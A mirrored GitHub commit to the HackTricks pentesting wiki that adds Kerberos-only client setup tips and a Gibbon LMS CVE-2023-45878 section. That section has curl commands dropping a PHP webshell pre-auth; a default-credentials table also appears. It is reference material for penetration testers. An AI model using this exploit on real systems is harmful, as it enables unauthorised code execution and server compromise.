maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1348 from HackTricks-wiki/update_HTB__TheFrizz_20250827_141120

Browse Source 
HTB TheFrizz
This commit is contained in:
SirBroccoli 2025-09-29 10:57:02 +02:00 committed by GitHub
commit 666428142b
4 changed files with 162 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

54
src/network-services-pentesting/pentesting-kerberos-88/README.md
View File

@ -19,6 +19,53 @@ PORT STATE SERVICE
### **To learn how to abuse Kerberos you should read the post about** [**Active Directory**](../../windows-hardening/active-directory-methodology/index.html)**.** ### **To learn how to abuse Kerberos you should read the post about** [**Active Directory**](../../windows-hardening/active-directory-methodology/index.html)**.**
## Kerberos-only environments: client prep and troubleshooting
When NTLM is disabled on domain services (SMB/WinRM/etc.), you must authenticate with Kerberos. Common pitfalls and a working workflow:
- Time synchronization is mandatory. If your host clock is skewed by more than a few minutes you will see `KRB_AP_ERR_SKEW` and all Kerberos auth will fail. Sync against the DC:
```bash
# quick one-shot sync (requires sudo)
sudo ntpdate <dc.fqdn> || sudo chronyd -q 'server <dc.fqdn> iburst'
```
- Generate a valid krb5.conf for the target realm/domain. `netexec` (CME fork) can output one for you while testing SMB:
```bash
# Generate krb5.conf and install it
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
sudo cp krb5.conf /etc/krb5.conf
```
- Obtain a TGT and verify the ccache:
```bash
kinit <user>
klist
```
- Use Kerberos with SMB tooling (no passwords sent, uses your ccache):
```bash
# netexec / CME
netexec smb <dc.fqdn> -k # lists shares, runs modules using Kerberos
# impacket examples also support -k / --no-pass to use the ccache
smbclient --kerberos //<dc.fqdn>/IPC$
```
- GSSAPI SSH single sign-on (OpenSSH to Windows OpenSSH server):
```bash
# Ensure krb5.conf is correct and you have a TGT (kinit)
# Use the FQDN that matches the host SPN. Wrong names cause: "Server not found in Kerberos database"
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>
```
Tips:
- Ensure your `/etc/hosts` resolves the exact FQDN you will SSH/SMB to, and that it comes before any bare domain entries if you are overriding DNS. SPN mismatches break GSSAPI.
- If NTLM is disabled on SMB you may see `STATUS_NOT_SUPPORTED` with NTLM attempts; add `-k` to force Kerberos.
## More ## More
### Shodan ### Shodan
@ -36,6 +83,13 @@ https://adsecurity.org/?p=541
Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek) Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek)
## References
- [NetExec (CME) wiki Kerberos and krb5.conf generation](https://www.netexec.wiki/)
- [OpenSSH GSSAPIAuthentication](https://man.openbsd.org/ssh_config#GSSAPIAuthentication)
- [MIT Kerberos Using Kerberos on UNIX](https://web.mit.edu/kerberos/krb5-1.12/doc/user/user_config.html)
- [0xdf HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
## HackTricks Automatic Commands ## HackTricks Automatic Commands
``` ```

31
src/network-services-pentesting/pentesting-smb/README.md
View File

@ -269,8 +269,8 @@ done
examples examples
```bash ```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME smbclient -U '%' -N \\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
``` ```
### **Enumerate shares from Windows / without third-party tools** ### **Enumerate shares from Windows / without third-party tools**
@ -402,6 +402,22 @@ smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com rpcclient -k ws01win10.domain.com
``` ```
In Kerberos-only environments (NTLM disabled), NTLM attempts against SMB may return `STATUS_NOT_SUPPORTED`. Fix common Kerberos issues and force Kerberos auth:
```bash
# sync clock to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# use Kerberos with tooling (reads your TGT from ccache)
netexec smb <dc.fqdn> -k
```
For a complete client setup (krb5.conf generation, kinit, SSH GSSAPI/SPN caveats) see:
{{#ref}}
../pentesting-kerberos-88/README.md
{{#endref}}
## **Execute Commands** ## **Execute Commands**
### **crackmapexec** ### **crackmapexec**
@ -560,8 +576,8 @@ Entry_1:
With Creds With Creds
smbmap -H {IP} -u {Username} -p {Password} smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash` smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
@ -597,5 +613,10 @@ Entry_6:
``` ```
{{#include ../../banners/hacktricks-training.md}} ## References
- [NetExec (CME) wiki Kerberos usage](https://www.netexec.wiki/)
- [Pentesting Kerberos (88) client setup and troubleshooting](../pentesting-kerberos-88/README.md)
- [0xdf HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
{{#include ../../banners/hacktricks-training.md}}

33
src/network-services-pentesting/pentesting-ssh.md
View File

@ -144,10 +144,31 @@ Some systems have known flaws in the random seed used to generate cryptographic
You should look here in order to search for valid keys for the victim machine. You should look here in order to search for valid keys for the victim machine.
### Kerberos ### Kerberos / GSSAPI SSO
**crackmapexec** using the `ssh` protocol can use the option `--kerberos` to **authenticate via kerberos**.\ If the target SSH server supports GSSAPI (for example Windows OpenSSH on a domain controller), you can authenticate using your Kerberos TGT instead of a password.
For more info run `crackmapexec ssh --help`.
Workflow from a Linux attacker host:
```bash
# 1) Ensure time is in sync with the KDC to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# 2) Generate a krb5.conf for the target realm (optional, but handy)
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
sudo cp krb5.conf /etc/krb5.conf
# 3) Obtain a TGT for the user
kinit <user>
klist
# 4) SSH with GSSAPI, using the FQDN that matches the host SPN
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>
```
Notes:
- If you connect to the wrong name (e.g., short host, alias, or wrong order in `/etc/hosts`), you may get: "Server not found in Kerberos database" because the SPN does not match.
- `crackmapexec ssh --kerberos` can also use your ccache for Kerberos auth.
## Default Credentials ## Default Credentials
@ -155,7 +176,7 @@ For more info run `crackmapexec ssh --help`.
| ---------- | ----------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | ---------- | ----------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| APC | apc, device | apc | | APC | apc, device | apc |
| Brocade | admin | admin123, password, brocade, fibranne | | Brocade | admin | admin123, password, brocade, fibranne |
| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, \_Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme | | Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
| Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler | | Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler |
| D-Link | admin, user | private, admin, user | | D-Link | admin, user | private, admin, user |
| Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin | | Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin |
@ -296,7 +317,7 @@ debug1: Next authentication method: password
Review the SSH server configuration is necessary to check that only expected\ Review the SSH server configuration is necessary to check that only expected\
methods are authorized. Using the verbose mode on the client can help to see\ methods are authorized. Using the verbose mode on the client can help to see\
the effectiveness of the configuration. the effectiveness of the configuration.
### Config files ### Config files
@ -377,6 +398,8 @@ The common lesson is that any deviation from the RFC-mandated state transitions
- [Unit 42 Erlang/OTP SSH CVE-2025-32433](https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/) - [Unit 42 Erlang/OTP SSH CVE-2025-32433](https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/)
- [SSH hardening guides](https://www.ssh-audit.com/hardening_guides.html) - [SSH hardening guides](https://www.ssh-audit.com/hardening_guides.html)
- [Turgensec SSH hacking guide](https://community.turgensec.com/ssh-hacking-guide) - [Turgensec SSH hacking guide](https://community.turgensec.com/ssh-hacking-guide)
- [Pentesting Kerberos (88) client setup and troubleshooting](pentesting-kerberos-88/README.md)
- [0xdf HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
## HackTricks Automatic Commands ## HackTricks Automatic Commands

59
src/pentesting-web/file-upload/README.md
View File

@ -115,8 +115,9 @@ Mitigations:
- **Possible Information disclosure**: - **Possible Information disclosure**:
1. Upload **several times** (and at the **same time**) the **same file** with the **same name** 1. Upload **several times** (and at the **same time**) the **same file** with the **same name**
2. Upload a file with the **name** of a **file** or **folder** that **already exists** 2. Upload a file with the **name** of a **file** or **folder** that **already exists**
3. Uploading a file with **".”, "..”, or "…” as its name**. For instance, in Apache in **Windows**, if the application saves the uploaded files in "/www/uploads/” directory, the ".” filename will create a file called "uploads” in the "/www/” directory. 3. Uploading a file with **"." , "..", or "…" as its name**. For instance, in Apache in **Windows**, if the application saves the uploaded files in "/www/uploads/" directory, the "." filename will create a file called
4. Upload a file that may not be deleted easily such as **"…:.jpg”** in **NTFS**. (Windows) uploads” in the "/www/" directory.
4. Upload a file that may not be deleted easily such as **"…:.jpg"** in **NTFS**. (Windows)
5. Upload a file in **Windows** with **invalid characters** such as `|<>*?”` in its name. (Windows) 5. Upload a file in **Windows** with **invalid characters** such as `|<>*?”` in its name. (Windows)
6. Upload a file in **Windows** using **reserved** (**forbidden**) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9. 6. Upload a file in **Windows** using **reserved** (**forbidden**) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
- Try also to **upload an executable** (.exe) or an **.html** (less suspicious) that **will execute code** when accidentally opened by victim. - Try also to **upload an executable** (.exe) or an **.html** (less suspicious) that **will execute code** when accidentally opened by victim.
@ -132,7 +133,7 @@ The `.inc` extension is sometimes used for php files that are only used to **imp
## **Jetty RCE** ## **Jetty RCE**
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell! If you can upload a XML file into a Jetty server you can obtain [RCE because **new *.xml and *.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>) ![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
@ -166,10 +167,54 @@ The execution of the payload occurs during the parsing of the configuration file
It's crucial to understand the lax nature of uWSGI's configuration file parsing. Specifically, the discussed payload can be inserted into a binary file (such as an image or PDF), further broadening the scope of potential exploitation. It's crucial to understand the lax nature of uWSGI's configuration file parsing. Specifically, the discussed payload can be inserted into a binary file (such as an image or PDF), further broadening the scope of potential exploitation.
### Gibbon LMS arbitrary file write to pre-auth RCE (CVE-2023-45878)
Unauthenticated endpoint in Gibbon LMS allows arbitrary file write inside the web root, leading to pre-auth RCE by dropping a PHP file. Vulnerable versions: up to and including 25.0.01.
- Endpoint: `/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php`
- Method: POST
- Required params:
- `img`: data-URI-like string: `[mime];[name],[base64]` (server ignores type/name, base64-decodes the tail)
- `path`: destination filename relative to Gibbon install dir (e.g., `poc.php` or `0xdf.php`)
- `gibbonPersonID`: any non-empty value is accepted (e.g., `0000000001`)
Minimal PoC to write and read back a file:
```bash
# Prepare test payload
printf '0xdf was here!' | base64
# => MHhkZiB3YXMgaGVyZSEK
# Write poc.php via unauth POST
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;test,MHhkZiB3YXMgaGVyZSEK&path=poc.php&gibbonPersonID=0000000001'
# Verify write
curl http://target/Gibbon-LMS/poc.php
```
Drop a minimal webshell and execute commands:
```bash
# '<?php system($_GET["cmd"]); ?>' base64
# PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;foo,PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==&path=shell.php&gibbonPersonID=0000000001'
curl 'http://target/Gibbon-LMS/shell.php?cmd=whoami'
```
Notes:
- The handler performs `base64_decode($_POST["img"])` after splitting by `;` and `,`, then writes bytes to `$absolutePath . '/' . $_POST['path']` without validating extension/type.
- Resulting code runs as the web service user (e.g., XAMPP Apache on Windows).
References for this bug include the usd HeroLab advisory and the NVD entry. See the References section below.
## **wget File Upload/SSRF Trick** ## **wget File Upload/SSRF Trick**
In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**\ In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**\
The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** (as in this example **".gif"** is a **valid** extension) but `wget` will **rename** the file to **"A"\*232+".php"**. The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"*232+".php"+".gif"**, this filename will **bypass** the **check** (as in this example **".gif"** is a **valid** extension) but `wget` will **rename** the file to **"A"*232+".php"**.
```bash ```bash
#Create file and HTTP server #Create file and HTTP server
@ -285,6 +330,7 @@ Below is an example of Python code used to create a malicious zip file:
import zipfile import zipfile
from io import BytesIO from io import BytesIO
def create_zip(): def create_zip():
f = BytesIO() f = BytesIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED) z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
@ -323,7 +369,7 @@ For further details **check the original post in**: [https://blog.silentsignal.e
```bash ```bash
:set modifiable :set modifiable
:%s/xxA/..\//g :%s/xxA/../g
:x! :x!
``` ```
@ -373,6 +419,9 @@ How to avoid file type detections by uploading a valid JSON file even if not all
- [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) - [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
- [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a) - [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
- [https://blog.doyensec.com/2025/01/09/cspt-file-upload.html](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html) - [https://blog.doyensec.com/2025/01/09/cspt-file-upload.html](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
- [usd HeroLab Gibbon LMS arbitrary file write (CVE-2023-45878)](https://herolab.usd.de/security-advisories/usd-2023-0025/)
- [NVD CVE-2023-45878](https://nvd.nist.gov/vuln/detail/CVE-2023-45878)
- [0xdf HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
- [The Art of PHP: CTFborn exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/) - [The Art of PHP: CTFborn exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
- [CVE-2024-21546 NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546) - [CVE-2024-21546 NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546)
- [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca) - [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca)